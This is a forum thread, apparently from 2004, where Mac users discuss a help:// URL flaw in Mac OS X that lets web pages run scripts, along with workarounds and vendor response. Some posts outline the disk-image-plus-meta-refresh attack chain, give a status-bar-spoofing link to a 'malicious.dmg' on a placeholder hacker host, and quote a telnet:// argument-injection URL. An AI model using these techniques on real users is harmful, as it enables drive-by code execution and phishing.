[Link]

The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.

[Person Man]

Originally posted by utidjian:
A totally fabricated scenario deleted.

Yes, it was totally fabricated, and way, way too simplistic. But I was using it to illustrate how it still could have innocently happened EVEN when the Microsoft flaw was known.

You should know by now that I like to use overly simplified (or too extreme) examples to attempt to make a point. I'm probably not very good at it, so I'll stop.

Face it, the engineers at Apple AND the people who manage them screwed up somehow. That "somehow" may never be known.

Yes. They screwed up. We probably never will know how they screwed up. That's not in dispute. The simple fact that the flaw even EXISTS means that they screwed up. That's not my point.

There are people in here who hold Apple to such a high standard that any screw-up is totally unacceptable and that a screw-up of the same magnitude committed by Microsoft is par for the course (and expected of them, to some extent). Well, guess what? The people who work at Apple are [gasp] human! We ALL screw up from time to time. Just like the people who work at Microsoft.

My statement that this flaw is no worse than the equivalent Microsoft flaw is not meant to minimize the importance of the flaw itself. I'm trying to point out the double-standard that has developed here. Microsoft is "expected" to have these problems, by virtue of their historical approach to operating system security. Apple is expected to NEVER have these problems, by virtue of their more "security minded" approach to operating system design. Well guess what? You can be more security-minded when it comes to designing an operating system and more aware of these issues, and you can STILL make mistakes of this magnitude! It doesn't make you any better or worse than anyone else. This incident proves that.

The question is not whether or not Apple has these flaws, but rather how MANY major, serious flaws will be discovered over time. I would expect Apple to have fewer of them OVER TIME, compared with Microsoft.

I was trying to defend Apple a lot more when I thought this was discovered only 2 or 3 days ago. Now that I know that it was reported to them over 2-3 months ago, I have to wonder what is taking them so long to say/do something about it, like everyone else in here.

What is far more interesting, to me, is how they are going to un-screw it... and when.

Yes. I'd like to know how and when, too. Some are submitting the story to Slashdot. Fine. I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.

And, historically, Apple has responded better than this to important security flaws. I want to know why they dropped the ball on this one.

[Person Man]

Originally posted by Person Man:
I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.

Oh yeah. Submitting this flaw to CERT and to the other reporting agencies wouldn't hurt either. And it may help the story get picked up by other news outlets

[utidjian]

Originally posted by Person Man:

There are people in here who hold Apple to such a high standard that any screw-up is totally unacceptable and that a screw-up of the same magnitude committed by Microsoft is par for the course (and expected of them, to some extent). Well, guess what? The people who work at Apple are [gasp] human! We ALL screw up from time to time. Just like the people who work at Microsoft.

Sure... people screw up. But Apple, as is Microsoft, are faceless corporations. Apple (the corporation) is the one at fault. As long as we are removed from the developers and maintainers of various parts of Mac OS X it is Apples responsibility.

My statement that this flaw is no worse than the equivalent Microsoft flaw is not meant to minimize the importance of the flaw itself. I'm trying to point out the double-standard that has developed here. Microsoft is "expected" to have these problems, by virtue of their historical approach to operating system security. Apple is expected to NEVER have these problems, by virtue of their more "security minded" approach to operating system design. Well guess what? You can be more security-minded when it comes to designing an operating system and more aware of these issues, and you can STILL make mistakes of this magnitude! It doesn't make you any better or worse than anyone else. This incident proves that.

Why do you keep conflating people and corporations?

Yes. I'd like to know how and when, too. Some are submitting the story to Slashdot. Fine. I think each of us should also report this through the proper channels as well. I did, by submitting a link to this thread.

And, historically, Apple has responded better than this to important security flaws. I want to know why they dropped the ball on this one.

It is difficult to tell how Apple has really _responded_ to security flaws because their rules of (non)disclosure make that very difficult to determine. Many though, certainly, not all MS security flaws have been patched well in advance of their becoming known. How many, if any, have Apples security flaws in Mac OS X been fixed before they were known, historically?
Historically we will never know why. Apple is a corporation that has a policy of non-disclosure on security issues.

For the sake of us Mac OS X users there needs to be a serious reconsideration of how security issues are reported and dealt with. Relying on submitting notice of flaws to slashdot.org in order to get a response from Apple seems to be... (how to say it?) a bit silly. Seems to me that Apple needs to get in better touch with its security issues and to its users than via slashdot.

[leraillez]

Originally posted by Person Man:

One: a disk image with the malicious code on it. (get the user to download it)
Two: issue a meta-refresh of the page after the image is downloaded (should be able to be accomplished with the right URL)
Three: as part of the refresh of the page, the <help:// ... run script (known path to malicious code on image)> command executes the malicious code on the image).

Just one option I'd like to add: I've had disk images that automatically launched the included installer once they were downloaded. The Apple Developper Documentation gives some information on this subject concerning the Internet-enabled disk images but they only talk about copying the content of the image not launching the installer.

It does not happen any more on my machine so I asked a friend to give it a try and the latest security update downloaded from Apple's web site did launch itself alone once Safari had finished the download and Disk Copy had mounted the image. The only thing is the updater did show a splash screen asking for user OK when automatically launched. This message box never reappeared when the pkg was relaunched afterwords. (it does not work on my machine for unknown reason, I have to manually launch everything).

This means there may be a way to launch automatically a trojan via a dmg and the possibility there is to automatically launch an installer. Could the installer be replaced by anyother application?

[Developer]

Originally posted by leraillez:
Could the installer be replaced by anyother application?

No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder). And Apple's installer always asks before installation. And explicitly asks again before running scripts in the install package.
It can not be used to execute code without user interaction (afawk).

[CharlesS]

Originally posted by Developer:
No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder). And Apple's installer always asks before installation. And explicitly asks again before running scripts in the install package.
It can not be used to execute code without user interaction (afawk).

Unless malicious code is in one of the scripts, and the user clicks "OK" without reading the dialog. I've never liked this auto-launch-packages feature.

[CharlesS]

sorry, double post

[Person Man]

Originally posted by utidjian:
Why do you keep conflating people and corporations?

Because corporations don't run themselves. People do.

[RayX]

Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.

Sarcasm detector *bing* *bing* *bing*

[leraillez]

Originally posted by Developer:

No, it can't. There is no installer on the disk image; it's an install package that is opened/installed by Apple's installer (in the Utilities folder).

Yes I know this but what I meant was: what assures us that only ".pkg" files can be automatically launched when a disk image is mounted and not any other kind of files such as ".app" files/folders!

[kangoo_boo]

If you guys are interested, there's an example of this bug with full demo here:

http://www.insecure.ws/article.php?s...04051612423136

[1010011010]

Originally posted by utidjian:
So there are currently 246 of these little gems on this system.

Run this in terminal to clean them up:

for i in `locate OpnApp.scpt`; do mv "$i" "$i.disabled"; done

It will add ".disabled" to the filename of all of the scripts in folders for which you have write access. If you want to rename them all, do this first:

sudo bash

then this from inside that root shell:

for i in `locate OpnApp.scpt`; do mv "$i" "$i.disabled"; done

[Developer]

Originally posted by 1010011010:
It will add ".disabled" to the filename of all of the scripts in folders for which you have write access.

Why would you want to do this? It will break help files, but will not help to protect you from this vulnerability. Help Viewer executes any script, not just the OpnApp scripts.

[Developer]

Originally posted by theolein:
I decided to submit the story to Slashdot, [...]

Your story is now up on Slashdot.

You should have written that the disk image is mountable via the disk: protocol and that automatic forwarding to disk: and help: can be done with meta refresh tags. The slashdot story doesn't make it obvious how serious the problem is.

[theolein]

Originally posted by Developer:
Your story is now up on Slashdot.

You should have written that the disk image is mountable via the disk: protocol and that automatic forwarding to disk: and help: can be done with meta refresh tags. The slashdot story doesn't make it obvious how serious the problem is.

I did write that. Pudge, the fu�king slashdot editor clown, decided to reject my story and accept a false version from someone else. I posted a correction in that thread.

[Developer]

Originally posted by theolein:
I did write that. Pudge, the fu�king slashdot editor clown, decided to reject my story and accept a false version from someone else. I posted a correction in that thread.

I see. I never read much Slashdot, but if that's the guy who is in charge of the Apple section, I now know why.

[1010011010]

Originally posted by Developer:
Why would you want to do this? It will break help files, but will not help to protect you from this vulnerability. Help Viewer executes any script, not just the OpnApp scripts.

Sounds like "help files" are already terminally busted.

[sniffer]

Well at least the media ball has started rolling. I know enough tabloid sites that'll just repost whatever headlines c|net or /. have regardless if it's correct or wrong and they really don't give a second to check out sources for details. It's all about archiving a few extra hits with least efforts. Anyhow the real issue is how Apple is going to act from here. Preferably, we'll have a security update soon, and even better they will improve their routines in terms of handling security issues and feedback. That said, I appreciate Developers effort to share his insight on the matter.

Now, all we have to now is to wait..

[Diggory Laycock]

As has been mentioned before in this thread - the vuln is in the 'Help Viewer' app's handling of URLs of the form: "help://" - you can reduce your exposure by setting your 'help://' protocol helper to anything other than the app 'Help Viewer.'

<pitch>
Setting Chess as the application that deals with the 'help://' protocol seems to deal with the vulnerability until Apple solves it completely.



MoreInternet makes this relatively easy - I'm glad to help. Drag the icon for the Chess app (/Applications/chess.app) to the icon well when "help" is selected as the protocol to change the app helper. (or just choose the app by clicking the 'change' button.)

Good work in spotting this, lixlpixel (and thanks for the bandwidth warning ) - we can only hope that Apple solves this problem soon - I believe that that they are keen to solve security problems quickly.

You can get MoreInternet by going to the Finder and choosing the "Go" menu -> "iDisk" -> "other user's public folder" and typing DiggoryLaycock into the text field that appears.
</pitch>

[kampl]

Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

[CharlesS]

Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

[theolein]

Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

This is not the case at all. A malicious site can do all this, with any OSX browser, without you doing ANYTHING at all. You just have to load the page and it's got you. This is in no way similar to the other recent hoaxes or trojans that require the user to do something.

[StacyK]

I'm glad too.

If for some reason you don't want to use MoreInternet, this fix can also be accomplished using the preferences pane in IE 5.2, that is if you are not such an Apple zealot that you deleted that ages ago. Once you set it there the change is good for Safari too.

Originally posted by Diggory Laycock:

MoreInternet makes this relatively easy - I'm glad to help.

[Mr Scruff]

Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...

[Simon]

No offense to Mr Scruff here, but I strongly advise everybody to look at the HTML source of the files that are linked to in this discussion before they click the link and run real code.

To pros this is certainly obvious, but maybe the less experienced users would just like to see a demo of the exploit and could run into problems if some sucker posts a "demo" link that turns out to be really malicious.

Here's what to do: Download the linked file with a CLI tool like curl or wget (so that it doesn't get executed by any helper app) and then look at the file with a simple text editor like pico, emacs, less or more (so that the you see the raw HTML code rather than the HTML). If you don't know what all this means you would rather not click on any such link at all. Chances are somebody could take advantage of the situation and really screw you.

[Simon]

I just reread my post and realized that it doesn't make sense.

The users that know the CLI tools involved probably know enough to not just click on any posted link.

The users who don't know the CLI tools can probably also not judge if the code is just a "good" demo or actually really malicious. I suggest these people should avoid clicking on these links altogether at least if they can't 100% trust the source. Apple.com should post a demo.

But, here's an easy to follow way to check the so-called demo links:
- In Safari right-lick on the link and save the linked file to your disk ("Save Linked File as...")
- Open the downloaded file from within a text app that will display the raw text and not the rendered HTML. TextEdit does not work because it renders right away. AppleWorks does work. I don't know about Word since I don't use it.
- Look for a line containing "help:runscript="

If you do not understand what this line does or if you are not 100% sure the line only demonstrates inoffensive things you should never click on the link and run the script.

[Love Calm Quiet]

I've been reading this thread for days, and no one seems to present an effective argument other than that this is a VERY serious security hole.

Isn't it extremely distressing that Apple hasn't taken any public action, made a statement, issued a warning?

Would someone more knowledgeable among you word what warning(s) seem at present to be most appropriate?

a) "Uncheck 'Open safe files...' " ?

b) "Even after (a), don't click on any hot links on sites you don't trust 100%" ?

[ I'd like to see if there agreement as to what self-protective steps are needed as of 10.3.3. ]

[Simon]

Originally posted by Love Calm Quiet:
what warning(s) seem at present to be most appropriate?

Here's my 1-2-3 suggestion:

Step 1) Download More Internet and use it to set Chess.app as the default helper app for the protocol "help" as noted earlier in this thread

Step 2) Send e-mail to Apple and tell them this needs to be fixed ASAP!

Step 3) Be careful. Do not trust everybody. Think before clicking.



P.S. Even if we assume Apple will fix their ridiculous mistake someday, step 3 will always remain valid.

[JLL]

Originally posted by Mr Scruff:
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...

Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

[Mr Scruff]

Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specifiy arguments (since it does the equivalent of double clicking it in the finder).

I don't think there are any commands that do any damage when run without any arguments.

[mbryda]

Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.

That's hilarious. M$ not respected by the masses. Every new worm and virus that comes out erodes that perception. If anything, people are starting to look at other options next time it comes time to replace their hardware/software.

Each upgrade is a harder and harder sell for M$. Look at M$'s stock price - it's lower than Apple's. Not much value there.

[theolein]

Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?

[[APi]TheMan]

Originally posted by Mr Scruff:
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specifiy arguments (since it does the equivalent of double clicking it in the finder).

I don't think there are any commands that do any damage when run without any arguments.

... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism. This is scary when you begin to consider the idea mentioned on the above website where unsolicited software could be installed, such as a "Free AOL Trial."

Also, a simple JavaScript could hide the destination URL of a link in some browsers as such:

<a href="disk://server.somehacker.com/malicious.dmg" onMouseOver="window.status='http://www.apple.com/'; return true">Click here to go to Apple's homepage</a>

In my tests I couldn't get Safari to utilize my status bar code, but Camino and Firefox did. One plus is that Camino has an option in preferences to prevent sites from changing the status bar in the Web Features section. Just one more thing to be careful of I suppose. Welcome to the internet, boys and girls.

Also, I set my protocol helper for "help:" to TextEdit, Chess takes too long to open on my mediocre speed G4.

[Developer]

What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?

[JLL]

Originally posted by [APi]TheMan:
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism.

Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.

[[APi]TheMan]

Originally posted by JLL:
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.

Ah-hah, so it is! Dually noted

[JLL]

Originally posted by theolein:
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?

Doesn't work.

[CharlesS]

Originally posted by Developer:
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?

It's not related, but it could potentially be a problem. It would require a bit of work, though - compromising someone's machine with this would not be effortless like it is with the hole being discussed in this thread.

[Love Calm Quiet]

Despite doing something dumb I (luckily) didn't wipe my home directory:

With MacNN reporting eWeek story on the OS X vulnerability, I followed the links to Isophonic's "patch". Stupidly I clicked on the first link (thinking it would explain more, and not noticing is was a .dmg):

"Don't Go There, GURLfriend 1.0 18 May 2004
We've just released Don't Go There, GURLfriend! 1.0 . DGTGF is an application you can use to patch away the OS X exploit found at http://bronosky.com/pub/AppleScript.htm quickly and efortlessly. Miroku Hotei, Ollie Wagner"

So... it mounts dmg, launches Help and Terminal, and completes the Terminal command.

I have no idea what "patch" was installed -- but it sure was a lesson in how readily my Safari browsing could turn over complete control to unknown scripting. (even though I had unchecked "open safe files" upon download in the Safari prefs.

Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?

[Developer]

Originally posted by Love Calm Quiet:
Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?

What I suggest:

Download and run MisFox (a program to change Internet preferences of the OS by the author of iCab):

http://www.clauss-net.de/misfox/misfox.html

click the Protocol Helpers tab and find the entry for the help: protocol. It will be set to Help Viewer. Change the entry to some other program like Chess. Should you encounter the exploit simply Chess will run instead of Help Viewer and no scripts will be executed.

When Apple has a fix for the problem, before you install the update run MisFox again and set the help: protocol back to Help Viewer (it's in /System/Library/Core Services/).

I suggest you do not attempt to install any fixes that try to edit the OpnApp scripts or delete the MacHelp.help folder. They do not completely protect from this vulnerability and are not easily to reverse.

[CharlesS]

Meh, use More Internet instead of MisFox. It's developed by a member these boards, and comes in a proper DMG file instead of a SIT.

[catsdorule]

Um whats with all the complicated fixes jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

[utidjian]

Originally posted by CharlesS:
Meh, use More Internet instead of MisFox. It's developed by a member these boards, and comes in a proper DMG file instead of a SIT.

Heh... well if the link to the download is setup correctly all one has to do is click on it and it will install it self! *rimshot*

[kampl]

Originally posted by CharlesS:
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.

[theolein]

Originally posted by kampl:
Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.

There are quite a lot of sites, mainly spammers' sites, sites of the type that used to download diallers onto your PC via IE, sites that downloaded spyware onto your PC via IE and porn sites that would love something as easy to implement as this. The site that wants to delete your data is rare, the site that wants to use you for their profit isn't.

[Groovy]

Originally posted by catsdorule:
Um whats with all the complicated fixes jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

IMHO that is not the best way because you lose help in apps you do want it.

IMHO the best way is to DL "More Internet" system pref and have the help: protocol
point to chess etc... That stops url abuse but lets already on mac apps access help.

I have tested it and it works well AND with "More Internet" system pref you can
do OTHER cools things also like add hotline: protocol and have those links
launch that app and connect to a server. (just an example)

[Spliffdaddy]

Did anyone bother to check and see if the 'Chess' app has a security hole?

[sniffer]

Originally posted by catsdorule:

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

What happen if you run repair permissions with disk util? What happen if you want to read help files? ( )

[theolein]

Originally posted by Spliffdaddy:
Did anyone bother to check and see if the 'Chess' app has a security hole?

That would be the riot of the day, if it turned out that Chess.app had a buffer overflow vulnerability: Queen to A6 -> joo R 0\/\/n3D N00b